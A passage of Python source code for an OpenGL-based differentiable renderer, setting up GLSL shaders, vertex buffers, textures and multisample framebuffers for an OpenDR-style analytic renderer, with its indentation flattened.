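rows = np.round(uv[:, 1] * (tex_h - 1))  # v -> row in [0, tex_h - 1]
flat = cols + rows * tex_w               # flat row-major texel index
```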
def checkBufferNum(self):
GL.glGenBuffers(1)
@depends_on('ft', 'f', 'frustum', 'camera')
def texcoord_image(self):
return self.draw_texcoord_image(self.v.r, self.f, self.ft, self.boundarybool_image if self.overdraw else None)
class AnalyticRendererOpenDR(ColoredRenderer):
terms = 'f', 'frustum', 'vt', 'ft', 'background_image', 'overdraw', 'ft_list', 'haveUVs_list', 'textures_list', 'vc_list' , 'imageGT'
dterms = 'vc', 'camera', 'bgcolor', 'texture_stack', 'v'
def __init__(self):
super().__init__()
def clear(self):
try:
GL.glFlush()
GL.glFinish()
# print ("Clearing textured renderer.")
# for msh in self.vbo_indices_mesh_list:
# for vbo in msh:
# vbo.set_array([])
[vbo.set_array(np.array([])) for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.bind() for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.delete() for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.set_array(np.array([])) for sublist in self.vbo_colors_mesh for vbo in sublist]
[vbo.bind() for sublist in self.vbo_colors_mesh for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_colors_mesh for vbo in sublist]
[vbo.delete() for sublist in self.vbo_colors_mesh for vbo in sublist]
[vbo.set_array(np.array([])) for sublist in self.vbo_verts_mesh for vbo in sublist]
[vbo.bind() for sublist in self.vbo_verts_mesh for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_verts_mesh for vbo in sublist]
[vbo.delete() for sublist in self.vbo_verts_mesh for vbo in sublist]
[vbo.set_array(np.array([])) for sublist in self.vbo_uvs_mesh for vbo in sublist]
[vbo.bind() for sublist in self.vbo_uvs_mesh for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_uvs_mesh for vbo in sublist]
[vbo.delete() for sublist in self.vbo_uvs_mesh for vbo in sublist]
[vbo.set_array(np.array([])) for sublist in self.vbo_face_ids_list for vbo in sublist]
[vbo.bind() for sublist in self.vbo_face_ids_list for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_face_ids_list for vbo in sublist]
[vbo.delete() for sublist in self.vbo_face_ids_list for vbo in sublist]
[GL.glDeleteVertexArrays(1, [vao.value]) for sublist in self.vao_tex_mesh_list for vao in sublist]
self.release_textures()
if self.glMode == 'glfw':
import glfw
glfw.make_context_current(self.win)
GL.glDeleteProgram(self.colorTextureProgram)
super().clear()
except Exception:
import pdb
pdb.set_trace()
print("Program had not been initialized")
def initGLTexture(self):
print("Initializing Texture OpenGL.")
FRAGMENT_SHADER = shaders.compileShader("""#version 330 core
// Interpolated values from the vertex shaders
//#extension GL_EXT_shader_image_load_store : enable
in vec3 theColor;
in vec2 UV;
uniform sampler2D myTextureSampler;
// Output data
out vec3 color;
void main(){
color = theColor * texture(myTextureSampler, UV).rgb;
}""", GL.GL_FRAGMENT_SHADER)
VERTEX_SHADER = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
layout (location = 0) in vec3 position;
layout (location = 1) in vec3 color;
layout(location = 2) in vec2 vertexUV;
uniform mat4 MVP;
out vec3 theColor;
out vec2 UV;
// Values that stay constant for the whole mesh.
void main(){
// Output position of the vertex, in clip space : MVP * position
gl_Position = MVP* vec4(position,1);
theColor = color;
UV = vertexUV;
}""", GL.GL_VERTEX_SHADER)
self.colorTextureProgram = shaders.compileProgram(VERTEX_SHADER,FRAGMENT_SHADER)
#Define the other VAO/VBOs and shaders.
#Text VAO and bind color, vertex indices AND uvbuffer:
position_location = GL.glGetAttribLocation(self.colorTextureProgram, 'position')
color_location = GL.glGetAttribLocation(self.colorTextureProgram, 'color')
uvs_location = GL.glGetAttribLocation(self.colorTextureProgram, 'vertexUV')
# color_location_ub = GL.glGetAttribLocation(self.colorProgram, 'color')
self.MVP_texture_location = GL.glGetUniformLocation(self.colorTextureProgram, 'MVP')
self.vbo_indices_mesh_list = []
self.vbo_colors_mesh = []
self.vbo_verts_mesh = []
self.vao_tex_mesh_list = []
self.vbo_uvs_mesh = []
self.textureID_mesh_list = []
# GL.glEnable(GL.GL_LINE_SMOOTH)
# GL.glHint(GL.GL_LINE_SMOOTH_HINT, GL.GL_NICEST)
GL.glLineWidth(2.)
for mesh in range(len(self.f_list)):
vaos_mesh = []
vbo_indices_mesh = []
vbo_face_ids_mesh = []
vbo_colors_mesh = []
vbo_vertices_mesh = []
vbo_uvs_mesh = []
textureIDs_mesh = []
for polygons in range(len(self.f_list[mesh])):
vao = GL.GLuint(0)
GL.glGenVertexArrays(1, vao)
GL.glBindVertexArray(vao)
f = self.f_list[mesh][polygons]
verts_by_face = np.asarray(self.v_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vbo_verts = vbo.VBO(np.array(verts_by_face).astype(np.float32))
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vbo_colors = vbo.VBO(np.array(colors_by_face).astype(np.float32))
uvs_by_face = np.asarray(self.ft_list[mesh].reshape((-1, 2))[f.ravel()], dtype=np.float32, order='C')
vbo_uvs = vbo.VBO(np.array(uvs_by_face).astype(np.float32))
vbo_indices = vbo.VBO(np.array(self.f_list[mesh][polygons]).astype(np.uint32), target=GL.GL_ELEMENT_ARRAY_BUFFER)
vbo_indices.bind()
vbo_verts.bind()
GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
vbo_colors.bind()
GL.glEnableVertexAttribArray(color_location) # from 'location = 1' in shader
GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
if self.haveUVs_list[mesh][polygons]:
vbo_uvs.bind()
GL.glEnableVertexAttribArray(uvs_location) # from 'location = 2' in shader
GL.glVertexAttribPointer(uvs_location, 2, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
#Textures:
texture = None
if self.haveUVs_list[mesh][polygons]:
texture = GL.GLuint(0)
GL.glGenTextures( 1, texture )
GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR)
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
image = np.array(np.flipud((self.textures_list[mesh][polygons])), order='C', dtype=np.float32)
GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGB32F, image.shape[1], image.shape[0])
GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
# GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image.reshape([image.shape[1], image.shape[0], -1]).ravel().tostring())
textureIDs_mesh = textureIDs_mesh + [texture]
vbo_indices_mesh = vbo_indices_mesh + [vbo_indices]
vbo_colors_mesh = vbo_colors_mesh + [vbo_colors]
vbo_vertices_mesh = vbo_vertices_mesh + [vbo_verts]
vbo_uvs_mesh = vbo_uvs_mesh + [vbo_uvs]
vaos_mesh = vaos_mesh + [vao]
self.textureID_mesh_list = self.textureID_mesh_list + [textureIDs_mesh]
self.vao_tex_mesh_list = self.vao_tex_mesh_list + [vaos_mesh]
self.vbo_indices_mesh_list = self.vbo_indices_mesh_list + [vbo_indices_mesh]
self.vbo_colors_mesh = self.vbo_colors_mesh + [vbo_colors_mesh]
self.vbo_verts_mesh = self.vbo_verts_mesh + [vbo_vertices_mesh]
self.vbo_uvs_mesh = self.vbo_uvs_mesh + [vbo_uvs_mesh]
GL.glBindTexture(GL.GL_TEXTURE_2D, 0)
GL.glBindVertexArray(0)
self.textureID = GL.glGetUniformLocation(self.colorTextureProgram, "myTextureSampler")
def initGL_AnalyticRenderer(self):
self.initGLTexture()
self.updateRender = True
self.updateDerivatives = True
GL.glEnable(GL.GL_MULTISAMPLE)
# GL.glHint(GL.GL_MULTISAMPLE_FILTER_HINT_NV, GL.GL_NICEST);
GL.glEnable(GL.GL_SAMPLE_SHADING)
GL.glMinSampleShading(1.0)
VERTEX_SHADER = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
layout (location = 0) in vec3 position;
layout (location = 1) in vec3 colorIn;
layout(location = 2) in vec2 vertexUV;
layout(location = 3) in uint face_id;
layout(location = 4) in vec3 barycentric;
uniform mat4 MVP;
out vec3 theColor;
out vec4 pos;
flat out uint face_out;
out vec3 barycentric_vert_out;
out vec2 UV;
// Values that stay constant for the whole mesh.
void main(){
// Output position of the vertex, in clip space : MVP * position
gl_Position = MVP* vec4(position,1);
pos = MVP * vec4(position,1);
//pos = pos4.xyz;
theColor = colorIn;
UV = vertexUV;
face_out = face_id;
barycentric_vert_out = barycentric;
}""", GL.GL_VERTEX_SHADER)
ERRORS_FRAGMENT_SHADER = shaders.compileShader("""#version 330 core
#extension GL_ARB_explicit_uniform_location : enable
#extension GL_ARB_explicit_attrib_location : enable
//layout(early_fragment_tests) in;
// Interpolated values from the vertex shaders
in vec3 theColor;
in vec2 UV;
flat in uint face_out;
in vec4 pos;
in vec3 barycentric_vert_out;
layout(location = 3) uniform sampler2D myTextureSampler;
uniform float ww;
uniform float wh;
// Output data
layout(location = 0) out vec3 color;
layout(location = 1) out vec2 sample_pos;
layout(location = 2) out uint sample_face;
layout(location = 3) out vec2 barycentric1;
layout(location = 4) out vec2 barycentric2;
void main(){
vec3 finalColor = theColor * texture(myTextureSampler, UV).rgb;
color = finalColor.rgb;
sample_pos = ((0.5*pos.xy/pos.w) + 0.5)*vec2(ww,wh);
sample_face = face_out;
barycentric1 = barycentric_vert_out.xy;
barycentric2 = vec2(barycentric_vert_out.z, 0.);
}""", GL.GL_FRAGMENT_SHADER)
self.errorTextureProgram = shaders.compileProgram(VERTEX_SHADER, ERRORS_FRAGMENT_SHADER)
FETCH_VERTEX_SHADER = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
void main() {}
""", GL.GL_VERTEX_SHADER)
FETCH_GEOMETRY_SHADER = shaders.compileShader("""#version 330 core
layout(points) in;
layout(triangle_strip, max_vertices = 4) out;
const vec2 data[4] = vec2[]
(
vec2(-1.0, 1.0),
vec2(-1.0, -1.0),
vec2( 1.0, 1.0),
vec2( 1.0, -1.0)
);
void main() {
for (int i = 0; i < 4; ++i) {
gl_Position = vec4( data[i], 0.0, 1.0 );
EmitVertex();
}
EndPrimitive();
}""", GL.GL_GEOMETRY_SHADER)
FETCH_FRAGMENT_SHADER = shaders.compileShader("""#version 330 core
#extension GL_ARB_explicit_uniform_location : enable
#extension GL_ARB_explicit_attrib_location : enable
layout(location = 2) uniform sampler2DMS colors;
layout(location = 3) uniform sampler2DMS sample_positions;
layout(location = 4) uniform usampler2DMS sample_faces;
layout(location = 5) uniform sampler2DMS sample_barycentric_coords1;
layout(location = 6) uniform sampler2DMS sample_barycentric_coords2;
uniform float ww;
uniform float wh;
uniform int sample;
// Output data
layout(location = 0) out vec3 colorFetchOut;
layout(location = 1) out vec2 sample_pos;
layout(location = 2) out uint sample_face;
layout(location = 3) out vec2 sample_barycentric1;
layout(location = 4) out vec2 sample_barycentric2;
//out int gl_SampleMask[];
const int all_sample_mask = 0xffff;
void main(){
ivec2 texcoord = ivec2(gl_FragCoord.xy);
colorFetchOut = texelFetch(colors, texcoord, sample).xyz;
sample_pos = texelFetch(sample_positions, texcoord, sample).xy;
sample_face = texelFetch(sample_faces, texcoord, sample).r;
sample_barycentric1 = texelFetch(sample_barycentric_coords1, texcoord, sample).xy;
sample_barycentric2 = texelFetch(sample_barycentric_coords2, texcoord, sample).xy;
}""", GL.GL_FRAGMENT_SHADER)
GL.glClampColor(GL.GL_CLAMP_READ_COLOR, False)
# GL.glClampColor(GL.GL_CLAMP_VERTEX_COLOR, False)
# GL.glClampColor(GL.GL_CLAMP_FRAGMENT_COLOR, False)
self.fetchSamplesProgram = shaders.compileProgram(FETCH_VERTEX_SHADER, FETCH_GEOMETRY_SHADER, FETCH_FRAGMENT_SHADER)
self.textureGT = GL.GLuint(0)
# GL.glActiveTexture(GL.GL_TEXTURE1)
# GL.glGenTextures(1, self.textureGT)
# GL.glBindTexture(GL.GL_TEXTURE_2D, self.textureGT)
# self.textureGTLoc = GL.glGetUniformLocation(self.errorTextureProgram, "imageGT")
# GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
# #
# try:
# if self.imageGT.r is not None and self.imageGT.r.size != 0: #if GT image is defined.
# image = np.array(np.flipud((self.imageGT.r)), order='C', dtype=np.float32)
# GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGB32F, image.shape[1], image.shape[0])
# GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
# except:
# pass
# GL.glGenTextures(1, self.textureEdges)
# GL.glBindTexture(GL.GL_TEXTURE_2D, self.textureEdges)
# GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
# GL.glActiveTexture(GL.GL_TEXTURE0)
whitePixel = np.ones([1,1,3])
self.whitePixelTextureID = GL.GLuint(0)
GL.glGenTextures( 1, self.whitePixelTextureID )
GL.glBindTexture(GL.GL_TEXTURE_2D, self.whitePixelTextureID)
image = np.array(np.flipud((whitePixel)), order='C', dtype=np.float32)
GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGB32F, image.shape[1], image.shape[0])
GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
self.fbo_ms_errors = GL.glGenFramebuffers(1)
GL.glDepthMask(GL.GL_TRUE)
GL.glEnable(GL.GL_MULTISAMPLE)
# GL.glHint(GL.GL_MULTISAMPLE_FILTER_HINT_NV, GL.GL_NICEST);
GL.glEnable(GL.GL_SAMPLE_SHADING)
GL.glMinSampleShading(1.0)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo_ms_errors)
self.texture_errors_render = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RGB8, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render, 0)
self.texture_errors_sample_position = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RG32F, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position, 0)
self.texture_errors_sample_faces = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_faces)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_R32UI, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT2, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_faces, 0)
#
self.texture_errors_sample_barycentric1 = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric1)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RG32F, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT3, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric1, 0)
self.texture_errors_sample_barycentric2 = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric2)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RG32F, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT4, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric2, 0)
self.z_buf_ms_errors = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.z_buf_ms_errors)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_DEPTH_COMPONENT24, self.frustum['width'], self.frustum['height'], False) # multisample textures require a sized internal format
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_TEXTURE_2D_MULTISAMPLE, self.z_buf_ms_errors, 0)
# self.z_buf_ms_errors = GL.glGenRenderbuffers(1)
# GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.z_buf_ms_errors)
# GL.glRenderbufferStorageMultisample(GL.GL_RENDERBUFFER, self.nsamples, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
# GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, self.z_buf_ms_errors)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
# GL.glDisable(GL.GL_CULL_FACE)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
framebufferStatus = GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER)
print("FRAMEBUFFER STATUS: " + str(framebufferStatus))
assert framebufferStatus == GL.GL_FRAMEBUFFER_COMPLETE
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
self.fbo_sample_fetch = GL.glGenFramebuffers(1)
GL.glDepthMask(GL.GL_TRUE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo_sample_fetch)
self.render_buffer_fetch_sample_render = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_render)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RGB8, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_render)
self.render_buffer_fetch_sample_position = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_position)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_position)
self.render_buffer_fetch_sample_face = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_face)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_R32UI, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT2, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_face)
#
self.render_buffer_fetch_sample_barycentric1 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric1)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT3, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric1)
self.render_buffer_fetch_sample_barycentric2 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric2)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT4, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric2)
self.z_buf_samples_errors = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.z_buf_samples_errors)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, self.z_buf_samples_errors)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glDisable(GL.GL_CULL_FACE)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
framebufferStatus = GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER)
print("FRAMEBUFFER STATUS: " + str(framebufferStatus))
assert framebufferStatus == GL.GL_FRAMEBUFFER_COMPLETE
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
#FBO_f
self.fbo_errors_nonms = GL.glGenFramebuffers(1)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo_errors_nonms)
render_buf_errors_render = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_render)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RGB8, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_RENDERBUFFER, render_buf_errors_render)
render_buf_errors_sample_position = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_position)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_RENDERBUFFER, render_buf_errors_sample_position)
render_buf_errors_sample_face = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_face)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_R32UI, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT2, GL.GL_RENDERBUFFER, render_buf_errors_sample_face)
#
render_buf_errors_sample_barycentric1 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric1)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT3, GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric1)
render_buf_errors_sample_barycentric2 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric2)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT4, GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric2)
#
z_buf_samples_errors = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, z_buf_samples_errors)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, z_buf_samples_errors)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
framebufferStatus = GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER)
print("FRAMEBUFFER STATUS: " + str(framebufferStatus))
assert framebufferStatus == GL.GL_FRAMEBUFFER_COMPLETE
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
self.textureObjLoc = GL.glGetUniformLocation(self.errorTextureProgram, "myTextureSampler")
#Add background cube:
position_location = GL.glGetAttribLocation(self.errorTextureProgram, 'position')
color_location = GL.glGetAttribLocation(self.errorTextureProgram, 'colorIn')
uvs_location = GL.glGetAttribLocation(self.errorTextureProgram, 'vertexUV')
face_ids_location = GL.glGetAttribLocation(self.errorTextureProgram, 'face_id')
barycentric_location = GL.glGetAttribLocation(self.errorTextureProgram, 'barycentric')
# self.vbo_verts_cube= vbo.VBO(np.array(self.v_bgCube).astype(np.float32))
# self.vbo_colors_cube= vbo.VBO(np.array(self.vc_bgCube).astype(np.float32))
# self.vbo_uvs_cube = vbo.VBO(np.array(self.ft_bgCube).astype(np.float32))
# self.vao_bgCube = GL.GLuint(0)
# GL.glGenVertexArrays(1, self.vao_bgCube)
#
# GL.glBindVertexArray(self.vao_bgCube)
# self.vbo_f_bgCube = vbo.VBO(np.array(self.f_bgCube).astype(np.uint32), target=GL.GL_ELEMENT_ARRAY_BUFFER)
